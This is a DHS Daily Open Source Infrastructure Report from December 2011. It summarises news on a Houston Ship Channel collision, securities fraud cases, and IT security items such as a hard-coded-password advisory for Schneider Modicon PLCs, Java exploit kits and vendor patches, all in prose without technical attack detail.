Thursday, December 15, 2011

Complete DHS Daily Report for December 15, 2011

Daily Report

Top Stories

• The Houston Ship Channel, the busiest U.S. petrochemical port, was shut indefinitely December 13 after two vessels collided in heavy fog, a U.S. Coast Guard spokesman said. – Reuters (See item 16)

16. December 13, Reuters – (Texas) Collision shuts Houston Ship Channel indefinitely. The Houston Ship Channel, the busiest U.S. petrochemical port, was shut indefinitely December 13 after two vessels collided in heavy fog, a U.S. Coast Guard (USCG) spokesman said. There were no fires after a tanker and a cargo vessel collided at about 8 a.m. near the Texas City Dike, which is in the lower end of the channel between Galveston and Texas City. There was no oil or chemicals spilled in the collision on the 53-mile waterway that routes vessels from the Gulf of Mexico to the huge complex of refineries in Houston and Texas City, a USCG spokesman said. He said the tanker was believed to be carrying the chemical acetone, a cleaning solvent. It was not known what the cargo vessel was carrying. The vessels involved were the tanker Charleston and the cargo vessel Harvest Sun, both about 50,000 tons dead weight, and about 600 feet long, the USCG said. The Charleston was northbound, headed to Houston. The Harvest Sun was southbound, headed from Houston to Texas City. Both vessels anchored safely outside the channel, awaiting investigators, the USCG spokesman said. He said Houston Pilots had stopped boarding vessels due to the fog prior to the accident, and it was unclear when the fog would lift or boarding would resume. Source:

• An electronic device used to control machinery in industrial facilities contains major weaknesses that could allow attackers to take it over remotely, the U.S. Industrial Control Systems Cyber Emergency Response Team warned. – The Register See item 34 below in the Information Technology Sector


Banking and Finance Sector

9. December 13, Indianapolis Business Journal – (Indiana; Michigan) Investment adviser Hauke agrees to plead guilty in $7M fraud. A former Fishers investment manager agreed December 13 to plead guilty to one count of securities fraud in Indianapolis, a charge that carries a maximum penalty of 25 years in prison. Federal prosecutors charged the manager with masking huge losses in his hedge fund for years as part of a scheme that ultimately resulted in 67 investors losing more than $7 million. Immediately after filing the criminal information in federal court in Indianapolis, the U.S. attorney’s office submitted a plea agreement. The agreement, which requires court approval, would prevent the government from recommending a prison sentence of more than 17 years. Indiana’s securities division began investigating the manager early in 2011 after a co-worker told the state about irregularities he had discovered. The FBI soon joined the probe. In August, the Indiana Business Journal reported the man’s hedge fund had invested millions of dollars into Michigan real estate 7 years ago without telling clients, and that the holdings ended up nearly worthless. Rather than fess up, the man created fake account statements for clients and used money from new investors to pay off earlier ones. In court papers, prosecutors alleged he diverted some investor funds for personal use, including paying off the mortgage on his home. Source:

10. December 13, Bloomberg – (National) SEC sues Security Investor Protection Corp. over Stanford claims. The U.S. Securities and Exchange Commission (SEC) December 12 sued the federal Securities Investor Protection Corp. (SIPC), seeking an order forcing it to create a claims process for victims of an alleged investment fraud. The SEC, in papers filed in federal court in Washington, D.C., said it had determined in June that thousands of those alleged victims may be entitled to SIPC coverage and that the agency’s unwillingness to act compelled the commission to sue. The SEC sued the head of the Stanford Group and three of his businesses in February 2009, claiming they were part of a $7 billion Ponzi scheme centered on the sale of certificates of deposit by Antigua-based Stanford International Bank. The financier was indicted by a U.S. grand jury in Houston 4 months later. Source:

11. December 13, New York Times – (National) Former Washington Mutual executives settle F.D.I.C. lawsuit. Former executives at Washington Mutual reached a $64 million agreement December 12 to settle a civil lawsuit with the government, according to officials with the Federal Deposit Insurance Corporation (FDIC), which pursued the case after the savings and loan collapsed in 2008. The deal is one of the larger amounts recovered in a financial crisis case, though only about $400,000 in total will be paid by the executives, according to a person briefed on the settlement but not authorized to discuss it. The FDIC initially sought $900 million in the case, which it filed in March. Much of the settlement will come from insurance policies the company took out for the executives, who are also releasing Washington Mutual from financial claims they have against it. The settlement money will be distributed among Washington Mutual’s creditors. It will not benefit the FDIC fund because it did not lose money when Washington Mutual foundered and was sold in part to JPMorgan Chase & Company, FDIC officials said. The FDIC accused executives of pushing Seattle-based Washington Mutual to the brink by making risky bets to reap short-term profits for themselves. In an unusual move, the FDIC also accused the wives of two of the executives of helping them shield some compensation from the company from legal claims. Source:

For another story, see item 39 below in the Information Technology Sector

Information Technology

34. December 14, The Register – (International) SCADA vuln imperils critical infrastructure, feds warn. An electronic device used to control machinery in water plants and other industrial facilities contains serious weaknesses that allow attackers to take it over remotely, the U.S. Industrial Control Systems Cyber Emergency Response Team warned. Some models of the Modicon Quantum PLC used in industrial control systems contain multiple hidden accounts that use predetermined passwords to grant remote access, the agency said in an advisory issued December 14. Palatine, Illinois–based Schneider Electric, the maker of the device, produced fixes for some of the weaknesses, and continues to develop additional mitigations. The programmable logic controllers reside at the lowest levels of an industrial plant, where computerized sensors meet the valves, turbines, or other machinery being controlled. The default passwords are hard-coded into Ethernet cards the systems use to funnel commands into the devices, and gets temperatures and other data out of them. The Ethernet modules also allow administrators to remotely log into the machinery using protocols such as telnet, FTP, and the Windriver Debug port. According to a blog post published December 12 by an independent security researcher, the NOE 100 and NOE 771 modules contain at least 14 hard-coded passwords, some of which are published in support manuals. Even in cases where the passcodes are obscured using cryptographic hashes, they are easy to recover thanks to documented weaknesses in the underlying VxWorks operating system. As a result, attackers can exploit the weakness to log into devices and gain privileged access to their controls. Source:

35. December 14, IDG News Service – (International) Hitachi-LG Data Storage execs plead guilty to price fixing. Three executives at Hitachi-LG Data Storage agreed to plead guilty and serve prison time in the United States for their participation in a series of conspiracies to rig bids and fix the prices of optical disk drives sold to large computer makers, the U.S. Department of Justice (DOJ) announced December 13. The three executives conspired with others to suppress competition by rigging bids for optical disk drives sold to Dell and Hewlett-Packard, and to fix prices for optical disk drives sold to Microsoft, the DOJ said. The conspiracies happened at various times between November 2005 and September 2009. Under a plea agreement in federal court in California, two of the executives each agreed to serve 8 months in prison, and the third agreed to serve 7 months in prison. Each also agreed to pay a $25,000 fine. Source:

36. December 14, The Register – (International) York CompSci student pleads guilty to Facebook hack. A computer enthusiast from York in the United Kingdom admitted to hacking into Facebook. The man pleaded guilty to hacking into the social networking site between April and May 2011 at a hearing December 13. The court heard the incident sparked a major security alert amid fears some form of industrial espionage was involved, the BBC reported. The man, a computer science student, previously advised Yahoo! on how to improve the security of its Web site. Although his subsequent actions against Facebook were not maliciously motivated, they were unauthorized and resulted in the extraction of what a prosecutor described as “highly sensitive intellectual property.” The man downloaded and stored code he wanted to work with offline. Although he attempted to delete his tracks, he was tracked down and arrested, after which he freely admitted his actions, which violated the U.K.’s Computer Misuse Act. Evidence of the hack was discovered during a routine security check. In a statement, Facebook explained its decision to file a criminal complaint, adding the “attack did not involve an attempt to compromise or access user data.” A sentencing hearing against the man is set for February 17. Source:

37. December 14, Infosecurity – (International) Use of the Black Hole exploit kit and Java exploits is growing. Security experts are increasingly concerned about the growth of Java as the application of choice for criminals. Java either is or will imminently become the favorite application attack vector, surpassing even PDF and SWF files. A security expert with Kaspersky Lab wrote that a Java exploit first published in October and used in drive-by attacks has found its way into the Black Hole exploit kit, aimed primarily at users in Russia, the United States, the United Kingdom, and Germany. “Java is probably the vector most commonly exploited by cybercriminals,” said a SophosLabs security expert, “and we don’t see any sign of this situation changing anytime soon. The Black Hole exploit pack is the most commonly used malicious software installer that SophosLabs have been seeing in the last three months.” According to Oracle, there are more than 13 million devices running Java. Criminals are turning to Java because they are businessmen — they tend to perform cost-benefit analyses. The problem with Java, said an ESET senior research fellow, comes “from the fragmentation of its implementations across platforms and devices. He noted he is unsure “how far it’s possible to fix it across the board.” Source:

38. December 13, Computerworld – (International) Microsoft scratches BEAST patch at last minute, but fixes Duqu bug. Microsoft issued 13 security updates December 13, 1 less than expected, that patched 19 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player. The company scrapped one bulletin it planned to deliver after SAP said the patch broke some of its software. The scrubbed security update was to fix the secure socket layer (SSL) 3.0 and transport layer security (TLS) 1.0 bug demonstrated in September by researchers who crafted a hacking tool dubbed BEAST (Browser Exploit Against SSL/TLS). SAP, the German developer that creates enterprise business operations and management software, was the third-party vendor who reported compatibility problems. Microsoft added it would rather pull a bulletin than “ship something that might inconvenience customers.” Microsoft did patch the vulnerability exploited by the Duqu intelligence-gathering trojan, however; that flaw was the subject of an advisory the company issued in early November after news broke of what some called a possible precursor to the next Stuxnet. Source:

39. December 13, threatpost – (International) Adobe pushes fix for ColdFusion cross site scripting hole. No word on Reader, Acrobat patch. Adobe released a patch December 13 for a vulnerability affecting versions of its ColdFusion Web application development platform. A company spokeswoman said the company still has not set a date for an emergency patch for a critical and previously unknown hole in both the Adobe Reader and Adobe Acrobat applications, after promising to issue a fix the week of December 12. The vulnerability affects ColdFusion versions 9.01, 9.0, 8.0.1, and 8.0 running on Microsoft Windows, Apple’s Mac, and the UNIX operating systems, and could be used in a cross site scripting attacks against those platforms, states an Adobe security bulletin. However, a developer who helped discover the hole said it did not allow malicious code to be executed in tests he performed. ColdFusion is a development platform used to create rich Internet applications. Web developers working for the Federal Reserve Bank of Atlanta discovered the cross site scripting vulnerability as part of an internal development project, according to a senior Web developer at the bank. He and a colleague reported the hole to Adobe in August, then worked with Adobe staff to fix it. He told threatpost that staff at the Federal Reserve Bank never found a way to use the hole to run malicious code on vulnerable systems. Source:

40. December 13, CNET News – (International) Google pulls more SMS fraud-related Android apps. Google removed five additional apps from the Android Market that mobile-security firm Lookout alleges appear to be engaged in SMS fraud targeting Europeans. The apps were removed after Lookout discovered them December 13, a Lookout representative told CNET. That brings the total number of apps removed that Lookout has dubbed “RuFraud” (Russian Fraud) to 27, the representative said. The apps, which appear to be free versions of legitimate games or wallpaper, are designed to charge premium SMS toll rates on European phones, Lookout said. The rates are buried within the terms of service, and users may not realize they will be charged $5 per SMS, according to the firm. Google confirmed December 12 it removed 22 Lookout-identified fraudulent apps before the firm found the 5 additional ones. Source:]

41. December 13, H Security – (International) Carrier IQ finds bug that has been saving SMS texts. Carrier IQ admitted in a report it has been saving some SMS text messages, but that the contents were not readable. Carrier is still responding to inquiries after it tried to silence a security researcher with a cease and desist order. The company later lifted that order but the researcher’s further disclosures have put the company on the defensive. The latest issue is the firm found a bug while auditing software. Carrier said the bug only occurs “in some unique circumstances,” when SMS messages are received during a call: the messages would be embedded in layer 3 radio messages and not decoded. The firm said it has remedied the bug. The disclosure came as Carrier is under further pressure to disclose more of how it operates. The report it issued also gives further details on how Carrier collects and processes data from mobile devices, including some details on its Mobile Service Intelligence Platform. Source:

Communications Sector

42. December 14, WSAZ 3 Huntington/Charleston – (West Virginia) Vandalism causes phone and Internet outage. Vandalism was to blame for a December 14 phone and Internet outage in parts of Cabell and Lincoln Counties, West Virginia. A spokesperson for Frontier Communications said about 1,000 customers were affected. Those customers are in Salt Rock and Hamlin. Service was expected to be restored around noon December 14. The vandalism happened the night of December 13. Source:

For more stories, see items 36, 40, and 41 above in the Information Technology Sector